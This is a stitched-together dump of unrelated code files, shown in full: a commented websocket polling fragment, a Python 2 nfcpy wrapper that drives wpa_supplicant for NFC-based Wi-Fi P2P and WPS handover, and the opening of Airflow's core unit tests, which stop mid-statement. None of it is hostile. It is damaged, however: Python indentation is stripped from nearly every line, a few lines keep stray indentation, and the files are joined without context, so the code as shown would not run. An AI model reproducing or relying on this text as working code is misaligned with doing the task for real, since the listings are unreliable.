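#   while api.connected_event.is_set():
#       try:
#           event = api.get_websocket_data_blocking(timeout=5)
#       except queue.Empty:
#           continue
#       print(event)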
|
p2p-nfc.py
|
#!/usr/bin/python
#
# Example nfcpy to wpa_supplicant wrapper for P2P NFC operations
# Copyright (c) 2012-2013, Jouni Malinen <[email protected]>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import os
import sys
import time
import random
import threading
import argparse
import nfc
import nfc.ndef
import nfc.llcp
import nfc.handover
import logging
import wpaspy
wpas_ctrl = '/var/run/wpa_supplicant'
ifname = None
init_on_touch = False
in_raw_mode = False
prev_tcgetattr = 0
include_wps_req = True
include_p2p_req = True
no_input = False
srv = None
continue_loop = True
terminate_now = False
summary_file = None
success_file = None
def summary(txt):
print(txt)
if summary_file:
with open(summary_file, 'a') as f:
f.write(txt + "\n")
def success_report(txt):
summary(txt)
if success_file:
with open(success_file, 'a') as f:
f.write(txt + "\n")
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError as error:
print("Could not find wpa_supplicant: ", error)
return None
if len(ifaces) < 1:
print("No wpa_supplicant control interface found")
return None
for ctrl in ifaces:
if ifname:
if ifname not in ctrl:
continue
try:
print("Trying to use control interface " + ctrl)
wpas = wpaspy.Ctrl(ctrl)
return wpas
except Exception as e:
pass
return None
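# Hedged sketch of the control-interface round trip the helpers below rely on:
# wpaspy.Ctrl.request() sends a command string and returns the textual reply,
# and callers here look for "OK"/"FAIL" substrings. "PING" is the standard
# liveness command and is normally answered with "PONG".
#
#   wpas = wpas_connect()
#   if wpas and "PONG" in wpas.request("PING"):
#       print("wpa_supplicant control interface is alive")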
def wpas_tag_read(message):
wpas = wpas_connect()
if (wpas == None):
return False
cmd = "WPS_NFC_TAG_READ " + str(message).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
if "FAIL" in wpas.request(cmd):
return False
return True
def wpas_get_handover_req():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_req_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF WPS-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel(tag=False):
wpas = wpas_connect()
if (wpas == None):
return None
if tag:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR-TAG").rstrip()
else:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF WPS-CR");
if "FAIL" in res:
return None
return res.rstrip().decode("hex")
def wpas_report_handover(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " P2P " + str(req).encode("hex") + " " + str(sel).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def wpas_report_handover_wsc(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " WPS " + str(req).encode("hex") + " " + str(sel).encode("hex")
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def p2p_handover_client(llc):
message = nfc.ndef.HandoverRequestMessage(version="1.2")
message.nonce = random.randint(0, 0xffff)
global include_p2p_req
if include_p2p_req:
data = wpas_get_handover_req()
if (data == None):
summary("Could not get handover request carrier record from wpa_supplicant")
return
print("Handover request carrier record from wpa_supplicant: " + data.encode("hex"))
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
global include_wps_req
if include_wps_req:
print("Handover request (pre-WPS):")
try:
print(message.pretty())
except Exception as e:
print(e)
data = wpas_get_handover_req_wps()
if data:
print("Add WPS request in addition to P2P")
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
print("Handover request:")
try:
print(message.pretty())
except Exception as e:
print(e)
print(str(message).encode("hex"))
client = nfc.handover.HandoverClient(llc)
try:
summary("Trying to initiate NFC connection handover")
client.connect()
summary("Connected for handover")
except nfc.llcp.ConnectRefused:
summary("Handover connection refused")
client.close()
return
except Exception as e:
summary("Other exception: " + str(e))
client.close()
return
summary("Sending handover request")
if not client.send(message):
summary("Failed to send handover request")
client.close()
return
summary("Receiving handover response")
message = client._recv()
if message is None:
summary("No response received")
client.close()
return
if message.type != "urn:nfc:wkt:Hs":
summary("Response was not Hs - received: " + message.type)
client.close()
return
print("Received message")
try:
print(message.pretty())
except Exception as e:
print(e)
print(str(message).encode("hex"))
message = nfc.ndef.HandoverSelectMessage(message)
summary("Handover select received")
try:
print(message.pretty())
except Exception as e:
print(e)
for carrier in message.carriers:
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.p2p":
print("P2P carrier type match - send to wpa_supplicant")
if "OK" in wpas_report_handover(data, carrier.record, "INIT"):
success_report("P2P handover reported successfully (initiator)")
else:
summary("P2P handover report rejected")
break
print("Remove peer")
client.close()
print("Done with handover")
global only_one
if only_one:
print("only_one -> stop loop")
global continue_loop
continue_loop = False
global no_wait
if no_wait:
print("Trying to exit..")
global terminate_now
terminate_now = True
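# Responder side of NFC connection handover: nfcpy invokes process_request()
# with the peer's handover request; a handover select message is built from
# carrier records fetched from wpa_supplicant and the exchanged records are
# reported with NFC_REPORT_HANDOVER ... RESP.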
class HandoverServer(nfc.handover.HandoverServer):
def __init__(self, llc):
super(HandoverServer, self).__init__(llc)
self.sent_carrier = None
self.ho_server_processing = False
self.success = False
# override to avoid parser error in request/response.pretty() in nfcpy
# due to new WSC handover format
def _process_request(self, request):
summary("received handover request {}".format(request.type))
response = nfc.ndef.Message("\xd1\x02\x01Hs\x12")
if not request.type == 'urn:nfc:wkt:Hr':
summary("not a handover request")
else:
try:
request = nfc.ndef.HandoverRequestMessage(request)
except nfc.ndef.DecodeError as e:
summary("error decoding 'Hr' message: {}".format(e))
else:
response = self.process_request(request)
summary("send handover response {}".format(response.type))
return response
def process_request(self, request):
self.ho_server_processing = True
clear_raw_mode()
print("HandoverServer - request received")
try:
print("Parsed handover request: " + request.pretty())
except Exception as e:
print(e)
sel = nfc.ndef.HandoverSelectMessage(version="1.2")
found = False
for carrier in request.carriers:
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.p2p":
print("P2P carrier type match - add P2P carrier record")
found = True
self.received_carrier = carrier.record
print("Carrier record:")
try:
print(carrier.record.pretty())
except Exception as e:
print(e)
data = wpas_get_handover_sel()
if data is None:
print("Could not get handover select carrier record from wpa_supplicant")
continue
print("Handover select carrier record from wpa_supplicant:")
print(data.encode("hex"))
self.sent_carrier = data
if "OK" in wpas_report_handover(self.received_carrier, self.sent_carrier, "RESP"):
success_report("P2P handover reported successfully (responder)")
else:
summary("P2P handover report rejected")
break
                message = nfc.ndef.Message(data)
sel.add_carrier(message[0], "active", message[1:])
break
for carrier in request.carriers:
if found:
break
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.wsc":
print("WSC carrier type match - add WSC carrier record")
found = True
self.received_carrier = carrier.record
print("Carrier record:")
try:
print(carrier.record.pretty())
except Exception as e:
print(e)
data = wpas_get_handover_sel_wps()
if data is None:
print("Could not get handover select carrier record from wpa_supplicant")
continue
print("Handover select carrier record from wpa_supplicant:")
print(data.encode("hex"))
self.sent_carrier = data
if "OK" in wpas_report_handover_wsc(self.received_carrier, self.sent_carrier, "RESP"):
success_report("WSC handover reported successfully")
else:
summary("WSC handover report rejected")
break
                message = nfc.ndef.Message(data)
sel.add_carrier(message[0], "active", message[1:])
found = True
break
print("Handover select:")
try:
print(sel.pretty())
except Exception as e:
print(e)
print(str(sel).encode("hex"))
summary("Sending handover select")
self.success = True
return sel
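# Terminal helpers: getch() switches stdin to raw mode and polls for a single
# keypress with a 50 ms select() timeout; clear_raw_mode() restores the saved
# terminal attributes so normal line-buffered output works again.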
def clear_raw_mode():
import sys, tty, termios
global prev_tcgetattr, in_raw_mode
if not in_raw_mode:
return
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
def getch():
import sys, tty, termios, select
global prev_tcgetattr, in_raw_mode
fd = sys.stdin.fileno()
prev_tcgetattr = termios.tcgetattr(fd)
ch = None
try:
tty.setraw(fd)
in_raw_mode = True
[i, o, e] = select.select([fd], [], [], 0.05)
if i:
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
return ch
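# Tag reading: forward WPS or P2P NDEF records found on a touched tag to
# wpa_supplicant via wpas_tag_read().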
def p2p_tag_read(tag):
success = False
if len(tag.ndef.message):
for record in tag.ndef.message:
print("record type " + record.type)
if record.type == "application/vnd.wfa.wsc":
summary("WPS tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
if record.type == "application/vnd.wfa.p2p":
summary("P2P tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
else:
summary("Empty tag")
if success:
success_report("Tag read succeeded")
return success
def rdwr_connected_p2p_write(tag):
summary("Tag found - writing - " + str(tag))
global p2p_sel_data
tag.ndef.message = str(p2p_sel_data)
success_report("Tag write succeeded")
print("Done - remove tag")
global only_one
if only_one:
global continue_loop
continue_loop = False
global p2p_sel_wait_remove
return p2p_sel_wait_remove
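# Tag writing ("write-p2p-sel" command): fetch a P2P handover select record
# from wpa_supplicant, wrap it in an NDEF handover select message and write
# it to the next tag that is touched.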
def wps_write_p2p_handover_sel(clf, wait_remove=True):
print("Write P2P handover select")
data = wpas_get_handover_sel(tag=True)
if (data == None):
summary("Could not get P2P handover select from wpa_supplicant")
return
global p2p_sel_wait_remove
p2p_sel_wait_remove = wait_remove
global p2p_sel_data
p2p_sel_data = nfc.ndef.HandoverSelectMessage(version="1.2")
    message = nfc.ndef.Message(data)
p2p_sel_data.add_carrier(message[0], "active", message[1:])
print("Handover select:")
try:
print(p2p_sel_data.pretty())
except Exception as e:
print(e)
print(str(p2p_sel_data).encode("hex"))
print("Touch an NFC tag")
clf.connect(rdwr={'on-connect': rdwr_connected_p2p_write})
def rdwr_connected(tag):
global only_one, no_wait
summary("Tag connected: " + str(tag))
if tag.ndef:
print("NDEF tag: " + tag.type)
try:
print(tag.ndef.message.pretty())
except Exception as e:
print(e)
success = p2p_tag_read(tag)
if only_one and success:
global continue_loop
continue_loop = False
else:
summary("Not an NDEF tag - remove tag")
return True
return not no_wait
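# Worker thread started once LLCP is connected: either initiate handover
# immediately (--init-on-touch), or wait for the peer/server to act while
# polling the keyboard ('i' = WPS+P2P, 'p' = P2P only, 'w' = WPS only).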
def llcp_worker(llc):
global init_on_touch
if init_on_touch:
print("Starting handover client")
p2p_handover_client(llc)
return
global no_input
if no_input:
print("Wait for handover to complete")
else:
print("Wait for handover to complete - press 'i' to initiate ('w' for WPS only, 'p' for P2P only)")
global srv
global wait_connection
while not wait_connection and srv.sent_carrier is None:
if srv.ho_server_processing:
time.sleep(0.025)
elif no_input:
time.sleep(0.5)
else:
global include_wps_req, include_p2p_req
res = getch()
if res == 'i':
include_wps_req = True
include_p2p_req = True
elif res == 'p':
include_wps_req = False
include_p2p_req = True
elif res == 'w':
include_wps_req = True
include_p2p_req = False
else:
continue
clear_raw_mode()
print("Starting handover client")
p2p_handover_client(llc)
return
clear_raw_mode()
print("Exiting llcp_worker thread")
def llcp_startup(clf, llc):
print("Start LLCP server")
global srv
srv = HandoverServer(llc)
return llc
def llcp_connected(llc):
print("P2P LLCP connected")
global wait_connection
wait_connection = False
global init_on_touch
if not init_on_touch:
global srv
srv.start()
if init_on_touch or not no_input:
threading.Thread(target=llcp_worker, args=(llc,)).start()
return True
def terminate_loop():
global terminate_now
return terminate_now
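# main(): parse command-line options, open the NFC device over USB and loop
# on clf.connect() handling tag read and/or LLCP connection handover until an
# operation completes or termination is requested.
# Illustrative invocations (exact script name and paths depend on deployment):
#   <this script> -i wlan0 --summary /tmp/nfc-summary.log
#   <this script> write-p2p-sel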
def main():
clf = nfc.ContactlessFrontend()
parser = argparse.ArgumentParser(description='nfcpy to wpa_supplicant integration for P2P and WPS NFC operations')
parser.add_argument('-d', const=logging.DEBUG, default=logging.INFO,
action='store_const', dest='loglevel',
help='verbose debug output')
parser.add_argument('-q', const=logging.WARNING, action='store_const',
dest='loglevel', help='be quiet')
parser.add_argument('--only-one', '-1', action='store_true',
help='run only one operation and exit')
parser.add_argument('--init-on-touch', '-I', action='store_true',
help='initiate handover on touch')
parser.add_argument('--no-wait', action='store_true',
help='do not wait for tag to be removed before exiting')
parser.add_argument('--ifname', '-i',
help='network interface name')
parser.add_argument('--no-wps-req', '-N', action='store_true',
help='do not include WPS carrier record in request')
parser.add_argument('--no-input', '-a', action='store_true',
help='do not use stdout input to initiate handover')
parser.add_argument('--tag-read-only', '-t', action='store_true',
help='tag read only (do not allow connection handover)')
parser.add_argument('--handover-only', action='store_true',
help='connection handover only (do not allow tag read)')
parser.add_argument('--freq', '-f',
help='forced frequency of operating channel in MHz')
parser.add_argument('--summary',
help='summary file for writing status updates')
parser.add_argument('--success',
help='success file for writing success update')
parser.add_argument('command', choices=['write-p2p-sel'],
nargs='?')
args = parser.parse_args()
global only_one
only_one = args.only_one
global no_wait
no_wait = args.no_wait
global force_freq
force_freq = args.freq
logging.basicConfig(level=args.loglevel)
global init_on_touch
init_on_touch = args.init_on_touch
if args.ifname:
global ifname
ifname = args.ifname
print("Selected ifname " + ifname)
if args.no_wps_req:
global include_wps_req
include_wps_req = False
if args.summary:
global summary_file
summary_file = args.summary
if args.success:
global success_file
success_file = args.success
if args.no_input:
global no_input
no_input = True
clf = nfc.ContactlessFrontend()
global wait_connection
try:
if not clf.open("usb"):
print("Could not open connection with an NFC device")
raise SystemExit
if args.command == "write-p2p-sel":
wps_write_p2p_handover_sel(clf, wait_remove=not args.no_wait)
raise SystemExit
global continue_loop
while continue_loop:
print("Waiting for a tag or peer to be touched")
wait_connection = True
try:
if args.tag_read_only:
if not clf.connect(rdwr={'on-connect': rdwr_connected}):
break
elif args.handover_only:
if not clf.connect(llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
else:
if not clf.connect(rdwr={'on-connect': rdwr_connected},
llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
except Exception as e:
print("clf.connect failed")
global srv
if only_one and srv and srv.success:
raise SystemExit
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.models.connection import Connection
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
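# CoreTest exercises core Airflow behaviour end to end: DagRun scheduling,
# Jinja templating and Variables, the Bash/Python/TriggerDagRun operators,
# configuration fallbacks and the time utilities in airflow.utils.dates.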
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is None:
session = Session()
session.query(models.TaskInstance).filter_by(
dag_id=TEST_DAG_ID).delete()
session.query(models.TaskFail).filter_by(
dag_id=TEST_DAG_ID).delete()
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
